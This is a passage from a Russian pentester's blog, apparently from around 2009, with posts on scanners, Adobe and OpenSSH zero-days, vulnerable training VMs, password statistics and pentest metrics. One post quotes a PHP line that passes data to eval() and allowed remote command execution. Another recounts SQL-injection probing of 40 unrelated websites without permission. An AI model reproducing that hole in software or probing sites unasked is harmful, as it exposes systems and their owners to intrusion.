То есть, скорость дефолтового сканирования увеличилась на 97%. Подобное быстродействие не может не впечатлять. Ну а какова цена такой производительности? Сравнив модной тулзой ndiff (входящей в состав nmap 5.x) два скана и подсчитав результаты, было получено, что 5% открытых портов пропущено последней версией nmap. Для многих целей, подобная цифра будет приемлемой, потому впечатление от последнего релиза сетевого сканера небольшой процент false positive ничуть не испортил.

7 zero-day (code exec) в продуктах Adobe, кто больше?

В последнее время посещают паранормальные очучения, при виде файлов в формате pdf:)) Коллеги из VUPEN основательно потрудились для того, чтобы использование всех творений Adobe на моем компутере не покидало пределов изолированной среды под vm:


С другой стороны, начинаю задумываться о том, что изолированная среда вовсе не выход, а стоит покупать второй ноут;)
http://www.microsoft.com/technet/security/bulletin/MS07-049.mspx
http://www.vupen.com/english/advisories/2007/2873
http://lists.vmware.com/pipermail/security-announce/2009/000055.html
http://communities.vmware.com/thread/209319
Immunity CANVAS Professional 6.47 (CVE-2009-1244): http://www.immunitysec.com/news-latest.shtml

Немного полезных ссылок по анализу защищенности Web-приложений

Web Application Security Consortium (WASC):
Текущая классификация уязвимостей Web WASC WSTCv2 - http://projects.webappsec.org/Threat-Classification-Working
Оф. сайт - http://www.webappsec.org/
Международная статистика уязвимостей - http://www.webappsec.org/projects/statistics/

Open Web Application Security Project (OWASP):
OWASP Testing Guide V 3.0 - http://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents
TOP 10 наиболее распространенных уязвимостей в Web - http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Из дополнительных вкусностей - болванки сигнатур для статического анализа кода, подборка утилит (1,2) для проведения различного поиска уязвимостей в Web-приложениях.

Positive Technologies:
Российская статистика уязвимостей – 2008, 2007, 2006

Возвращаясь к анализу слабых паролей

Давно засело в голове провести имеющиеся наборы паролей по комбинациям соседних символов на клавиатуре, содержащихся в файле "Combinations.txt", который поставляется совместно с дистрибутивом InsidePro PasswordsPro. Желание мотивировано в первую очередь в получении оценки эффективности использования подобных комбинаций, например, при проведении пентеста. Результаты получены следующие:


Еще один 0day с Adobe

Уязвимостями нулевого дня в продуктах компании Adobe уже ни кого не удивишь:) Они появляются и исчезают вновь и вновь. Несчастная Adobe даже предлагает пользователям установить уязвимую сборку Adobe Reader. Видимо не успевают пересобрать свой продукт под напором активных багоискателей и компаний ресерчеров. И вот он снова – первый день нулевого дня с Adobe;)


Зачем нужен пентест?

Цель любого тестирования на проникновение, вопреки распространенному заблуждению, состоит не в демонстрации возможности осуществления успешной атаки (взломать можно все что угодно и метод "кувалды" никто не отменял;)), а в использовании результатов подобных работ для совершенствования системы управления информационной безопасностью (далее - СУИБ). Безусловно, этого удается достигнуть только при правильной интерпретации полученных данных и при отработке широкого охвата возможных и наиболее реализуемых вариантов атаки. Под "правильной" интерпретацией результатов пентеста нужно понимать, что помимо оперативного устранения уязвимостей Заказчику подобных услуг следует также осуществить выстраивание процессов СУИБ таким образом, чтобы предотвратить их появление в дальнейшем.

Ценность тестирования на проникновение состоит в возможности смоделировать последовательность выполняемых действий потенциальным злоумышленником, в условиях, максимально приближенных к реальности. Это позволяет выяснить, где безопасность работает хуже, а где лучше, выявить наиболее уязвимые места в информационной системе, причины и следствия успешной атаки (если она была реализована), а также проверить надежность существующих механизмов защиты в целом.

Подборка ресурсов для проведения оценки средств поиска и эксплуатации уязвимостей

Сборки виртуальных машин:
– Широко известный дистрибутив DVL (Damn Vulnerable Linux), не требующий комментариев
– Сборка Moth, содержащая наборы уязвимых сценариев Web-приложений. Авторы предполагают использование своего творения под цели:
  • Проведения тестирования сканеров Web уязвимостей;
  • Тестирование статических и динамических анализаторов;
  • Использование дистрибутива при проведении соответствующего учебного курса.
- Сборка от OWASP - OWASP Broken Web Applications Virtual Machine (VM)
- Сборка Web Security Dojo - http://sourceforge.net/projects/websecuritydojo/
- Сборка Damn Vulnerable Web App (DVWA)
- Сборка от Google - Web Application Exploits and Defenses

Stand-alone сборки уязвимых Web-приложений:
OWASP SiteGenerator
OWASP WebGoat
OWASP Vicnum
OWASP InsecureWebApp
Stanford SecuriBench
SecuriBench Micro
Mutillidae
ButterFly
HacmeBank
BadStore

Древние сборки реальных приложений (в частности WEB):
- http://www.oldapps.com/

Подборка аналогичных online-ресурсов:
– Тестовые сайты от Acunetix (PHP, ASP, ASP.NET)
- Тестовый сайт от NT OBJECTives
- Тестовый сайт от SPI Dynamics (теперь уже от HP)
- Тестовый сайт от компании IBM
- И тестовый сайт от Cenzic

Юридическая сторона пентеста

На днях в блоге компании InfoWatch обсуждалась интересная тема для пентестеров: "Насколько безопасным с юридической точки зрения (ст.273 УК РФ) является использование «специальных» программ при проведении пентеста?".

Тот факт, что владелец информации и оператор ИС дал своё согласие на проведение атаки освобождает пентестера от ответственности по ст.272 УК, но никак не влияет на квалификацию действий пентестера по ст.273 УК. То есть, "вредоносные программы вне закона всегда".

Sniffing по электросети

Не перестаю удивляться, насколько порой мышление хакеров может быть нестандартным и оригинальным. На этот раз под прицелом оказались нотебуки, подключенные к обычной розетке 220В (кто бы мог подумать;)). Атака, направленная на перехват нажатия клавиш на ноуте, подключенного к обычной электросети, получил название – "power-line exploit". Про данную технику будет подробно рассказано на конференции Black Hat USA 09, ну а все интересующиеся с материалами могут ознакомиться уже сейчас (здесь).

Источник: www.xakep.ru

Появился zero-day к OpenSSH?

Интернет пестрит сообщениями о том, что сплоит под OpenSSH, который был выложен на Milw0rm и демонстрировал отказ в обслуживании демона (proof-of-concept), был переписан хакерской группой "anti-sec" уже с целью получения рутовой консоли. Использование эксплоита под предыдущие версии демона было официально подтверждено (рекомендую всем патчиться;)).

Возможно "утка", но появилось сообщение от SANS, что в прошлую пятницу зафиксировано использование zero-day, выполняющего аналогичные действия по получению рута через OpenSSH. Эксплуатация была произведена на последней версии демона.

Потому, всем параноикам рекомендую закрыть ssh файрволом, как лекарство от лишних угроз:)

Ссылки по теме:
http://romeo.copyandpaste.info/txt/nowayout.txt
http://security-sh3ll.blogspot.com/2009/07/openssh-0day.html
http://seclists.org/fulldisclosure/2009/Jul/0028.html
http://www.securityaegis.com/?p=445

milw0rm прекращает свое существование

Один из самых популярных порталов в интернете по эксплоитам прекращает свою работу. Вот такое прощальное послание было опубликовано сегодня администратором сайта str0ke на заглавной странице:


Что тут еще можно добавить? Достойных ресурсу milw0rm в настоящее время попросту нет. Остается только надеяться, что придут новые люди, которые не дадут проекту загнуться в одночасье. Ну а пока, сайт milw0rm.com недоступен.

Источник: securitylab.ru

Безопасность языком цифр #6

Для чего нужны различного рода метрики? Для того, чтобы можно было оценить текущее состояние, например, своей информационной системы со средними показателями других систем. Что это нам дает? Как минимум позволяет наметить курс действий (где мы находимся?; насколько у нас лучше или хуже, чем у других?), как максимум увидеть процент соответствия, с какими-либо промышленными стандартами или "лучшими практиками" (best practice) и отслеживать динамику состояния защищенности своей информационной системы.

Приведу пример. У нас имеется метрика, что 40% паролей можно взломать из-за простоты, а в Компании не используется каких-либо превентивных мер в отношении противодействия атакам удаленного подбора паролей и при этом имеются внешние сервисы, использующие однофакторную аутентификацию с использованием парольной фразы (Mail, Web-сервисы, SAP, VPN, etc.). Таким образом, угроза, связанная с компрометацией паролей пользователей, должна получить высокий уровень опасности в качественной модели управления рисками.

ИБ в госсекторе у нас и за рубежом

Прогуливаясь сегодня по новостным ресурсам, мое внимание привлекла новость на xakep.ru, относительно результатов проведенного аудита ИБ государственного пенсионного фонда Миннесоты. Дело в том, что перечисленные проблемы ИБ, выявленные зарубежными коллегами, аналогичным образом наблюдаются и у нас в России. Это следующие недостатки: "…плохо сконфигурированные файрволы и беспроводные сети, слабые пароли и отсутствие общей системы управления безопасностью, способной реагировать на изменение типов угроз".


Особенно улыбнуло схожесть подходов, как у нас, так и за рубежом: "…исполнительного директора пенсионного фонда Миннесоты Дэвида Бегстрема данная информация не удивила" и "…сотрудники фонда считают, что добились в этом вопросе существенных успехов…".

Не стану комментировать, каких таких "успехов" могли добиться сотрудники фонда Миннесоты при полученных результатах аудита, потому как воочию видел подобного рода "успехи". Но, к сожалению, такие "успехи" и подходы со стороны руководства приводят к реальным утечкам конфиденциальной информации, как у них, так и у нас.

Возвращаясь к теме слабых паролей

В проведенном исследовании проблем парольной защиты, я неоднократно использовал термин "слабые", не стойкие к взлому пароли. А что же тогда можно считать стойким паролем?

По моему личному убеждению, минимально стойким паролем является такой пароль, который удовлетворяет всем следующим требованиям:

• должен содержать символы нижнего и верхнего регистра, цифры, специальные символы и знаки препинания;
• должен быть не менее 8 символов;
• не должен полностью или частично совпадать с логином, например – admin/admin, admin/admin1 и т.д.;
• не должен образовывать цифро-буквенные простые последовательности, например – "abcd12345","aabb2255", "QQrTTr55" и т.п;
• не должен являться словом из словаря, сленга, диалекта, жаргона и т.п.
• не должен являться персональной информацией (имена членов семьи, адреса, телефоны, даты рождения и т.п.).

Методика оценки соответствия ИБ по СТО БР ИББС-1.2-2009

Доступна для загрузки методика оценки соответствия ИБ по Стандарту Банка России. Думаю, будет интересна всем аудиторам, выполняющим соответствующие работы в банковском секторе.

Определение уровня соответствия ИБ требованиям СТО БР ИББС-1.0 по этой методике происходит путем оценки следующих основных направлений:

— уровень осознания ИБ организации;
— менеджмент ИБ организации;
— текущий уровень ИБ организации.

Также весьма полезным в представленной методике является рассчитанный «Коэффициент значимости частного показателя ИБ» по каждому оцениваемому критерию СТО БР ИББС-1.0.

Статистика используемых паролей пользователями в Российских компаниях

Прочитав как-то новость о том, что в России не проводилось глубокого исследования используемых пользователями паролей, я решил исправить сложившуюся ситуацию и стать первопроходцем:)

С полными результатами проведенного исследования можно ознакомиться в разделе "Аналитика" на официальном сайте Positive Technologies.

ЗЫ: Неоценимую помощь в проведении исследования и своими креативными идеями помогал мой руководитель по работе и просто позитивный человек – Сергей Гордейчик.

Выполнение команд на сервере в функции eval()

Как-то довелось мне исследовать одно Web-приложение методом black-box, в котором была выявлена красиво эксплуатабельная уязвимость, позволяющая выполнять произвольные команды на сервере.

На этапе проведения сканирования, в поле зрения попало следующее сообщение об ошибке:


Уязвимый код (полученный по окончании работ):

...
if($_CONFIG["STATUS"]) eval(mkPHPeval($TMP));
...

Немного статистики

В свое время (в третьем квартале 2008 г.) на securitylab.ru проводился опрос среди посетителей ресурса, однако результаты проведенного опроса нигде не были опубликованы. В связи с этим, решил исправить эту ситуацию и поделиться собранными данными с общественностью.

Портрет участников

В проведенном опросе приняло участие более 500 участников. Анализ портрета респондентов по количеству компьютеров в организации показал, что наибольшая доля опрошенных респондентов (57%) приходится на малый бизнес (менее 100 компьютеров). Вторая по численности группа респондентов попала в категорию от 100 до 1000 компьютеров в организации (26%). Третья и четвертые группы – это представители крупного бизнеса и Федеральных госструктур. Их распределение более 3000 (11%) компьютеров для третьей и 1000 – 3000 (6%) компьютеров для четвертой группы соответственно. Примечательно, что представителей очень крупного бизнеса (более 3000 компьютеров), принявших участие в опросе, оказалось больше на 5%, чем представителей менее крупного бизнеса (1000 – 3000 компьютеров в организации).

Безопасность языком цифр #5

Как показывают проводимые сканирования в отношении Web-приложений при проведении внешних и внутренних пентестов, 23% из числа уязвимых Web-приложений требуют устранения уязвимостей путем исправления исходного кода (т.е. содержат уязвимости: SQL-Injection, Cross-Site Scripting, Path Traversal, etc). В целом - это соответствует данным статистики уязвимостей Web-приложений за 2008.

Если же рассматривать совокупное число выявляемых уязвимостей по всем сканируемым системам (ОС, сетевое оборудование, СУБД и пр.), то ~34% из их числа в отношении Web-приложений связаны с несоблюдением парольной политики и ~32% уязвимостей возникают из-за проблем в конфигурации Web-приложений.

Server-side с ModRewrite

Когда мы видим web-ресурс в адресной строке, которого красуется "id=", как-то рефлекторно хочется добавить одинарную кавычку в подобный запрос. Возможно для того, чтобы не искушать своих посетителей, web-разработчики активно используют ModRewrite. Но не всегда его использование оказывается полезным.

Эпизодически приходится сталкиваться с уязвимостями различной степени критичности, в web-приложениях использующие mod_rewrite. Это связано с тем, что безопасность приложения в подобных случаях пытаются обеспечить модулем Apache, но при этом задают неточные регулярные выражения. Так, использование директивы RewriteRule с "кривым" regexp:

Безопасность языком цифр #4

Практика проведения работ по анализу защищенности внутренних информационных систем показывает, что все используемые СУБД Oracle содержат от одной до нескольких уязвимостей. Так, 60% всех выявленных уязвимостей связано с плохим patch management, а 10% приходится на проблемы, связанные с парольной политикой.

Уязвимости в СУБД составляют 5% от общего числа всех выявляемых недостатков во внутренних информационных системах при их обследовании.

LOPHTCRACK IS BACK

Сегодня на блоге SpxnezzaR увидел пост о том, что разработка легендарной утилиты L0phtCrack будет продолжена. Не смог удержаться, чтобы не заценить новую версию L0phtCrack 6, благо она уже доступна в триале.

Насколько часто встречается уязвимость SQL-Injection?

Недавно проводил небольшое исследование на тему распространенности уязвимости "Внедрение операторов SQL" в реальных условиях. Не выдумывая сложных сценариев, перешел на один из тематических каталогов на Yandex портале и последовательно переходил на web-страницы, приведенные в нем. Для поиска SQL Injection использовал самые элементарные и только безопасные проверки (такие, как одинарная и двойная кавычка, отрицательные значения переменных типа int и т.п.), уделяя на каждый сайт не более 1-2 минут. Таким образом, я мог детектить только самые грубые ошибки в реализации web-приложений. И что же с результатами? Из 40 web-узлов, 15 содержали уязвимость SQL Injection (эксплуатабельность не проверял:)) т.е. 37,5% из тестового набора. На мои оповещения, на адреса админов о наличии серьезной уязвимости на их сайте, был получен только один ответ благодарности (случайно зацепил известную CMS;)).

Заметка об антивирусах

Эпизодически ко мне обращаются, чтобы я порекомендовал выбрать наиболее качественный антивирус. Для того, чтобы не повторяться, решил озвучить свое мнение в блоге.

Итак, во-первых, я искренне сочувствую домашним пользователям:) При активном серфинге сайтов эротического содержания с правами локального администратора, никакое антивирусное средство, увы, не спасет. Добавив к этому грамотность среднестатистического домашнего пользователя в вопросах обеспечения информационной безопасности, как у компьютера остается слишком мало шансов сохранить себя в первозданной чистоте без различного рода паразитов. Тут и ярко выраженный человеческий фактор, и проблемы с патчменеджментом, и работа с повышенными привилегиями и т.п. Безусловно, вендоры за последние несколько лет двигаются семимильными шагами, но, даже будучи очень бдительным и подкованным домашним пользователем, подцепить какую-нибудь заразу, когда компьютер используется в качестве развлекательного ресурса, достаточно просто. Подтверждением тому служит то, что опорную сеть крупных ботнетов составляют именно компьютеры домашних пользователей:) Сама идеология такого пользователя такова, что вроде как секретов на компьютере нет, потому и нет ничего страшного в том, что компьютер поучаствует в распределенной DoS-атаке... К сожалению, достаточно часто слышу подобную позицию.

Безопасность языком цифр #3

Как показывает проведение внутренних тестов на проникновение, наиболее критические (экстренные) уязвимости чаще всего встречаются в операционных системах - 57,3%, и в используемых Web-приложениях - 37,3%. Меньший impact, но также достаточно высокого уровня опасности уязвимости, можно встретить в СУБД - 30,6%, и снова в используемых Web-приложениях - 51,3%.

Наибольшее число проблем, связанных с несоблюдением парольной политики во внутренних сетях, встречается в сетевом оборудовании - 49,3%. А наиболее печальная ситуация с процессом установления обновлений безопасности замечено у используемых Web-приложений - 44,3%.

И нет конца борьбы со спамом

Забавное сообщение появилось у меня в блоге, после публикации последнего поста:


В полученном письме меня поблагодарили за борьбу с международным спамом:)


Проследовав по предложенной ссылке, передо мной извинились от лица всех ботов (особенно улыбнуло;)), но сказали, что меня ожидает ручная верификация...


Однако забавно даже то, что данный пост удалось опубликовать без труда (капча не в счет), а говорилось, что «я не могу публиковать новые сообщения, пока блог не будет разблокирован». Небольшие формальные несоответствия, но в целом...

Сканеры безопасности, как инструмент реализация стратегии ИБ

Современный бизнес тесно связан с использованием информационных технологий, которые в свою очередь подвержены различным угрозам информационной безопасности (далее – ИБ). В случае реализации некоторой угрозы, может возникнуть ситуация, в которой нарушится некоторый бизнес-процесс или произойдет утечка важных данных и пр. Следствием этого может стать снижение стоимости акций компании, снижение уровня доверия со стороны партнеров/клиентов и т.п. Для того, чтобы минимизировать подобные риски, компании вынуждены заниматься вопросами, связанными с обеспечением ИБ. Более того, в ряде случаев эта необходимость вызвана желанием или требованием соответствовать различным критериям, как законодательным (ФЗ, указы президента и др.), так и международным (ISO/IEC 27005:2008, PCI DSS, SOX и др.).

Компания, которая уделяет должное внимание обеспечению ИБ, должна управлять своими информационными активами и угрозами, которым они могут быть подвержены. Сканеры безопасности как раз и являются инструментом, помогающим в решении данной задачи.

Безопасность языком цифр #2

Сколько времени требуется при проведении внутреннего пентеста для возможности получения аудитором прав Enterprise Admins? Как показывает практика проведения подобных работ для Российских Компаний, при первом тестировании на проникновение получить подобные привилегии в корневом домене удается в среднем за два с половиной дня.

Полноценной аналогичной статистики по повторному тестированию на проникновение нет, но практика показывает, что последующие пентесты сопряжены с гораздо большими сложностями достижения аналогичных целей. Либо не представляется возможным реализовать данную угрозу за приемлемое время, которое выделено на проведение подобных работ. Конечно же, речь идет про Компании, которые после проведения первого тестирования на проникновение не только учли и закрыли выявленные бреши в своей информационной системе, но и организовали необходимые процессы СУИБ для отслеживания появления подобных уязвимостей в дальнейшем и своевременному закрытию векторов проникновения, связанных с их эксплуатацией.

Таким образом, получается, что внутренний пентест при правильном подходе, позволяет в значительной степени поднять уровень информационной безопасности у Заказчика этих услуг.

Наиболее простые и распространенные уязвимости, приводящие к компрометации корпоративного домена, приведены здесь.

Безопасность языком цифр

Сегодня занимался расчетом метрик по PCI DSS на основе данных, полученных при проведении работ по тестированиям на проникновение. Так, по статистическим данным получается, что приблизительно 30% узлов из области проводимого сканирования, при проведении соответствующих работ, содержат от одной до нескольких уязвимостей. Если же рассматривать метрику только в отношении "живых" узлов, содержащих хотя бы один сервис, то ситуация будет еще более удручающей – 50-60% исследуемых систем содержат от одной до нескольких уязвимостей. Цифра действительно впечатляет, т.к. речь идет про внешний периметр сети. Безусловно, возможный impact будет гораздо меньше, потому как не все уязвимости эксплуатабильны и многие из них могут использоваться только для проведения DoS-атаки. Однако мораль сей басни такова, что во всех подобных случаях удавалось пробить внешний периметр сети.

XSpider - самый позитивный сканер безопасности

Способно ли программное средство выявить уязвимость аля проведение атаки методом социальной инженерии? На самом деле способно:)

Взломали qip.ru

Оригинальная новость сегодня пестрит в нете: "Сегодня ночью был взломан официальный сайт популярного мессенджера мгновенных сообщений qip.ru".





Сразу же напрашивается мысль о том, что сайт то могли прозохать не сегодня ночью, а скажем пару лет назад… и вместе с дистрибутивом на протяжении всего времени распространять руткита, который по команде своего создателя активируется:) респект всем любителям QIP;))

Оригинальная ссылка: http://www.securitylab.ru/news/379218.php

Немного про вай-вай

Недавно проводил пентест по wifi. Немного поснифал трафик, немного поигрался с aireplay-ng, поломал WEP и в том же состоянии закинул ноут на работу. Через несколько дней вспомнил, что пора писать отчет о проделанной работе. Залогинился на боевой ноут и увидел, что все это время работал CommView for WiFi. Но каково же было мое удивление, когда я глянул на траф, который он поймал за это время...


На работе меня окружает более 99 тысяч беспроводных устройств! ну это уж слишком:)

Гарантированный взлом. Пять слабых звеньев ИБ.

Несмотря на то, что внешнему периметру сети уделяется самое пристальное внимание со стороны как системных администраторов, так и безопасников, в большинстве случаев становится возможным проникнуть во внутреннюю сеть используя различные вектора атаки. Безусловно, многие из пробиваемых векторов связаны с масштабом исследуемой сети, со штатом работающих в ней сотрудников, а также с границами проведения работ (чем шире границы работ, тем выше вероятность успешного проникновения). Однако, из всех используемых векторов атаки при проведении подобных работ, можно выделить те, на долю успешности реализации которых приходится наибольшее количество проникновений. Следовательно, обращая внимания на используемые недостатки, перечисленные ниже, можно снизить риски информационной безопасности, связанные с компрометацией информационной системы со стороны внешнего злоумышленника.

Итак, наиболее опасным вектором проникновения, конечно же, является использование человеческого фактора. Социальная инженерия – это самый пробиваемый вектор атаки при проведении внешнего пентеста. Что тут можно добавить? Во-первых, для минимизации последствий подобной атаки, безусловно, необходимо обучать пользователей основам безопасности при работе в Интернете. Однако этого недостаточно, т.к. при грамотно организованной социалке, даже матерые системные администраторы могут допустить оплошность и осуществить переход по ссылке на вроде бы безобидный сайт, тем самым сдав свою сеть атакующему. Поэтому необходима организация комплекса мер по защите информации, в том числе организация работы конечных пользователей и системных администраторов с пониженными привилегиями, различные проактивные механизмы защиты на рабочих местах, контроль трафика и пр. Во-вторых, достаточно часто при проведении вектора атаки с использованием социальной инженерии применяется вектор атаки с эксплуатацией уязвимостей в ПО на рабочих местах. Поэтому, стоит обратить внимание на процесс управления обновлениями, и не только со стороны продуктов компании Microsoft, но и со стороны обновления таких продуктов, как уязвимых компонентов ActiveX, Flash Player или Acrobat Reader, на долю которого по заявлениям F-Secure приходится около 28,6% успешных атак.